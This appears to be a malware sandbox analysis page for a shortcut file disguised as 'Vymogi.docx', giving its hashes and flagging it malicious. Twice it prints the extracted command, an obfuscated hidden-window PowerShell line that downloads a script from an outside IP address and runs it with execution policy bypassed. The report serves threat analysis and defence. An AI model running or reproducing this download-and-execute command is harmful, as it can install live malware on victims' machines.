General
Structural Analysis
Config.0
Yara Rules17
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 5dab64f727f7b7fe050a8ed03ac221c4
|
| Sha1 | fd2b063059693350ed0e6e3bc7aedfefb1f3326f
|
| Sha256 | 5c8b75c558d1af88f739fcb709b9fa025edb8e84c8371c6c2e4c7960066b4c2f
|
| Sha384 | 61d6590eaa6fe3878d305682dd4a4e65f7fe8ed3add8b96b4209ac2eaabcb8fc6c9f903ee1ce80143681da03c1fd4683
|
| Sha512 | ae89e2b07fc8683347d7b2482e215fc790f5950cafa8dc9c81d04d2b5a1aa726ae48da44e19b0682f00b02a799ea5b35c531afca0852f0f16134d8f75e8bd4d7
|
| SSDeep | 12:8d/NNs0oN9JzVUNm74SN9Jo6es8XNeesniHXSOI+1gS3cB1k65KI4t3DaOkQr+rE:8d/NkPzEWPfedRiiHaqg/4v1GO6R3
|
| TLSH | AB2289016BE14215F9B3BA3C6E76B24089BB3568FE3DA7CC0245D52C4831956E2F4F16
|
File Structure
Vymogi.docx.lnk
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -win 1 iwr -uri ht''t''p://''5.8.18''.46/rkrtt/stalk.ps1 -OutFile stalk.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\stalk.ps1" |
Vymogi.docx.lnk (10.02 KB)
File Structure
Vymogi.docx.lnk
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -win 1 iwr -uri ht''t''p://''5.8.18''.46/rkrtt/stalk.ps1 -OutFile stalk.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\stalk.ps1" Malicious |
Vymogi.docx.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.